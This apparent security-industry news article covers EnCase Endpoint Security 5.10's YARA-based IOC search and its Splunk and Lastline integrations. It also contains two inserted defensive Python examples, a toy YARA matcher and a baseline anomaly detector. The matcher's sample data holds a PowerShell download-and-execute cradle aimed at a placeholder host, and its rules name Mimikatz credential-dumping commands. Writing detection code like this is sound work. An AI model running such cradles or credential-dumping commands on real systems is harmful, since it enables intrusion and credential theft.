Guidance Teams with Splunk & Lastline For Faster, Smarter Incident Response

Guidance Software is fortifying its endpoint detection and response with a new release of EnCase Endpoint Security, as well as new partnerships and deep integration with Splunk and Lastline. The goal is to cut time and complexity for threat detection and prevention.

Tags: alerts, analytics, cybersecurity, EnCase, endpoint security, forensics, Guidance, incident response, intrusion, Lastline, malware, Splunk, threat detection, YARA



Guidance hopes all these efforts will reduce the time required by security teams to triage and validate alerts from a rapidly growing number of internal security tools and external threat-intelligence sources, according to Roger Angarita, Guidance’s director of product management.


“Security teams cannot tolerate inefficiency in their daily activities. We’ve worked to solve this by increasing interoperability between the tools they use most often and by delivering fast access to trusted endpoint data. Our customers demand continuous innovation that meets them right where they live and work,” Angarita said in a statement.


The latest update to EnCase Endpoint Security (v5.10) streamlines the workflow for security teams, letting them search endpoints for known indicators of compromise (IOCs) and identify threats already validated by internal or external industry sources. This improvement comes from EnCase’s newly added support for IOC searches written as YARA rules. YARA is a pattern-matching tool that malware researchers use to identify and classify malware samples: a rule names the text or binary patterns (strings, byte sequences) to look for, and a condition states which combination of them constitutes a match.
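To make concrete what "searching for IOCs with YARA rules" involves, here is an added example that is not Guidance's, EnCase's or the YARA project's code: a toy Python matcher for a small subset of YARA syntax (text strings with an optional `nocase` modifier, hex strings with `??` wildcards, and conditions built from string identifiers, `and`/`or`/`not`, parentheses, `any of them` and `all of them`), run over constructed sample file contents. The rule names, the sample bytes and the placeholder URL are all made up for the example; a real deployment would use the `yara` engine (or `yara-python`) rather than this subset.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample rules, written in real YARA syntax. This toy matcher understands only a
# subset: text strings (optionally 'nocase'), hex strings with '??' wildcards, and conditions
# made of string identifiers, and/or/not, parentheses, 'any of them' and 'all of them'.
SAMPLE_RULES = r'''
rule PowerShell_Download_Cradle
{
    meta:
        description = "constructed example: PE image carrying a PowerShell download cradle"
    strings:
        $mz = { 4D 5A ?? ?? 03 00 }
        $ps = "powershell" nocase
        $dl = "DownloadString"
    condition:
        $mz and ($ps or $dl)
}

rule Mimikatz_Module_Strings
{
    strings:
        $a = "sekurlsa::logonpasswords"
        $b = "privilege::debug"
    condition:
        all of them
}
'''

RULE_RE = re.compile(r"rule\s+(\w+)\s*\{(.*?)\n\}", re.S)
STRING_RE = re.compile(r'\$(\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"(\s+nocase)?|\{([^}]*)\})')
ALLOWED_TOKENS = {"True", "False", "and", "or", "not", "(", ")"}


@dataclass
class Rule:
    name: str
    strings: dict[str, re.Pattern]   # identifier -> compiled byte pattern
    condition: str                   # whitespace-normalised condition text


def hex_to_regex(body: str) -> bytes:
    """Turn a YARA hex string body ('4D 5A ?? 00') into a byte regex; '??' matches any byte."""
    return b"".join(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])) for tok in body.split())


def parse_rules(text: str) -> list[Rule]:
    rules = []
    for name, body in RULE_RE.findall(text):
        head, _, condition = body.partition("condition:")
        strings_src = head.split("strings:", 1)[1] if "strings:" in head else ""
        strings = {}
        for ident, txt, nocase, hexbody in STRING_RE.findall(strings_src):
            if hexbody:
                strings[ident] = re.compile(hex_to_regex(hexbody), re.S)
            else:
                literal = re.sub(r"\\(.)", r"\1", txt).encode("latin-1")   # undo \" and \\ escapes
                strings[ident] = re.compile(re.escape(literal), re.I if nocase else 0)
        rules.append(Rule(name, strings, " ".join(condition.split())))
    return rules


def evaluate(condition: str, matched: dict[str, bool]) -> bool:
    """Evaluate a condition given which strings matched. Only boolean tokens reach eval()."""
    if condition == "any of them":
        return any(matched.values())
    if condition == "all of them":
        return bool(matched) and all(matched.values())
    try:
        expr = re.sub(r"\$(\w+)", lambda m: str(matched[m.group(1)]), condition)
    except KeyError as exc:
        raise ValueError(f"condition references undefined string {exc}") from None
    tokens = expr.replace("(", " ( ").replace(")", " ) ").split()
    bad = [t for t in tokens if t not in ALLOWED_TOKENS]
    if bad:
        raise ValueError(f"unsupported condition token(s): {bad}")
    return bool(eval(" ".join(tokens), {"__builtins__": {}}, {}))


def scan(data: bytes, rules: list[Rule]) -> dict[str, list[str]]:
    """Return {rule_name: [matched string identifiers]} for every rule whose condition holds."""
    hits = {}
    for rule in rules:
        matched = {ident: pat.search(data) is not None for ident, pat in rule.strings.items()}
        if evaluate(rule.condition, matched):
            hits[rule.name] = sorted(ident for ident, ok in matched.items() if ok)
    return hits


# Constructed sample "files": a fake PE header plus a download cradle, a text file holding
# Mimikatz command strings, and a benign document. None of this is real malware.
SAMPLE_FILES = {
    "dropper.exe": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 16
                   + b"PoWeRsHeLl -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')",
    "notes.txt": b"run privilege::debug then sekurlsa::logonpasswords",
    "readme.txt": b"quarterly report, nothing to see here",
}


def scan_files(files: dict[str, bytes] = SAMPLE_FILES, rule_text: str = SAMPLE_RULES) -> dict[str, dict]:
    rules = parse_rules(rule_text)
    return {name: scan(data, rules) for name, data in files.items()}


if __name__ == "__main__":
    for name, hits in scan_files().items():
        print(f"{name}: {hits or 'no match'}")
```

The point an analyst should take from this is that a YARA hit is evidence of a pattern, not a verdict: the `nocase` modifier and `??` wildcards exist precisely because attackers vary casing and patch bytes, and the condition clause is where a rule author controls false positives (requiring the PE header `$mz` together with one of the script strings, rather than any single string alone).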


This focus on quicker and more accurate detection is also augmented through its partnerships with Splunk and Lastline. Specifically:

  • Integration with Splunk Enterprise to collect and present trusted endpoint telemetry automatically when a security alert is generated, ensuring faster decisions and a dramatic reduction in false positives for security teams.
  • File reputation checking from malware protection vendor Lastline, allowing security analysts to validate the threat artifacts of suspect files directly within EnCase, accelerating the decision process.

Michael Harris, Guidance’s chief marketing officer, highlighted the increasing importance endpoint security plays in today’s new ‘extended enterprise’ architectures in a recent blog post:

Many organizations—in both private and public sectors—house extremely sensitive data. High-value data is ideally confined to properly fortified servers, and tightly sealed off with aggressive whitelisting and rigorous audits. Multi-factor authentication and strong passwords are critical, and there’s a new tactic that becomes more crucial with every hack we learn about: active, ongoing anomaly hunting.

Sensitive data tends to congregate on network endpoints such as laptops and servers, and it has a habit of multiplying into errant, unauthorized copies in unauthorized storage locations. For that reason, it’s essential for today’s security teams to create and regularly update baselines of normal activity for each endpoint that houses sensitive data, and to then actively watch for signs of anomalous behavior against those baselines.
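The baseline-then-compare approach Harris describes, as an added Python example that is not from Guidance's blog post or from EnCase: a per-endpoint baseline of which process names, binary hashes and parent processes are normal, a check that flags process starts deviating from that endpoint's own baseline, and a refresh step that folds analyst-confirmed benign activity back into the baseline. The endpoint names, process events and hash values are constructed placeholders.

```python
from __future__ import annotations

from dataclasses import dataclass, field

# Constructed process-start telemetry for two endpoints (the "sha256" values are placeholders,
# not real digests). In practice these records would come from the endpoint agent.
BASELINE_EVENTS = [
    {"endpoint": "FIN-LAPTOP-07", "process": "svchost.exe", "parent": "services.exe", "sha256": "h-svchost-1"},
    {"endpoint": "FIN-LAPTOP-07", "process": "excel.exe", "parent": "explorer.exe", "sha256": "h-excel-1"},
    {"endpoint": "FIN-LAPTOP-07", "process": "outlook.exe", "parent": "explorer.exe", "sha256": "h-outlook-1"},
    {"endpoint": "HR-LAPTOP-02", "process": "svchost.exe", "parent": "services.exe", "sha256": "h-svchost-1"},
]

NEW_EVENTS = [
    {"endpoint": "FIN-LAPTOP-07", "process": "excel.exe", "parent": "explorer.exe", "sha256": "h-excel-1"},      # normal
    {"endpoint": "FIN-LAPTOP-07", "process": "svchost.exe", "parent": "explorer.exe", "sha256": "h-svchost-1"},  # odd parent
    {"endpoint": "FIN-LAPTOP-07", "process": "svchost.exe", "parent": "services.exe", "sha256": "h-unknown-9"},  # odd binary
    {"endpoint": "FIN-LAPTOP-07", "process": "mimikatz.exe", "parent": "cmd.exe", "sha256": "h-mimikatz-1"},    # never seen
    {"endpoint": "HR-LAPTOP-02", "process": "excel.exe", "parent": "explorer.exe", "sha256": "h-excel-1"},       # normal on FIN, new on HR
]


@dataclass
class ProcessProfile:
    """What 'normal' looks like for one process name on one endpoint."""
    hashes: set[str] = field(default_factory=set)
    parents: set[str] = field(default_factory=set)


def update_baseline(baseline: dict, events: list[dict]) -> dict:
    """Fold events into the per-endpoint baseline; used both to build it and to refresh it later."""
    for ev in events:
        profile = baseline.setdefault((ev["endpoint"], ev["process"]), ProcessProfile())
        profile.hashes.add(ev["sha256"])
        profile.parents.add(ev["parent"])
    return baseline


def build_baseline(events: list[dict]) -> dict:
    return update_baseline({}, events)


def detect_anomalies(baseline: dict, events: list[dict]) -> list[dict]:
    """Return the events that deviate from their endpoint's baseline, each with its reasons."""
    findings = []
    for ev in events:
        profile = baseline.get((ev["endpoint"], ev["process"]))
        reasons = []
        if profile is None:
            reasons.append("process never observed on this endpoint")
        else:
            if ev["sha256"] not in profile.hashes:
                reasons.append("binary hash not in baseline for this process name")
            if ev["parent"] not in profile.parents:
                reasons.append("parent process not in baseline")
        if reasons:
            findings.append({**ev, "reasons": reasons})
    return findings


def demo() -> tuple[int, int]:
    """Detect against the initial baseline, then refresh the baseline with one analyst-confirmed
    benign event (svchost.exe launched from explorer.exe) and detect again."""
    baseline = build_baseline(BASELINE_EVENTS)
    before = detect_anomalies(baseline, NEW_EVENTS)
    update_baseline(baseline, [NEW_EVENTS[1]])
    after = detect_anomalies(baseline, NEW_EVENTS)
    return len(before), len(after)


if __name__ == "__main__":
    for f in detect_anomalies(build_baseline(BASELINE_EVENTS), NEW_EVENTS):
        print(f["endpoint"], f["process"], "->", "; ".join(f["reasons"]))
```

Two design choices matter here. The baseline is keyed per endpoint, so a process that is routine on one machine is still flagged the first time it appears on another, which is what Harris's per-endpoint framing asks for. And the refresh is deliberately driven by explicit analyst input rather than by automatically absorbing everything seen, since a baseline that learns from unreviewed activity will eventually learn the intrusion as normal.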

One cybersecurity analyst, Enterprise Strategy Group’s Doug Cahill, said the Guidance steps help fill a gap in threat detection and response. “Incident response teams need open standards in order to bring the most power to bear in their daily work,” Cahill said. He added that enabling IOCs in a standardized and actionable format is a “big step” in promoting endpoint detection and response functionality.


In total, EnCase Endpoint Security 5.10 delivers capabilities to cybersecurity teams to let them more easily:

  • Create an asset list and verify system details of connected endpoints
  • Verify security policies are not being evaded by rogue processes or users
  • Identify visibility gaps left by other security technologies
  • Integrate with alerting technologies to capture time sensitive data for analysis
  • Increase efficiency through response automation and scheduled actions
  • Drastically decrease alert validation times
  • Provide automated and manual incident response by the leader in digital forensic solutions
  • Centralize homegrown scripts into a single solution with greater access to endpoint activity
  • Audit sensitive data, and identify and securely erase document-based risk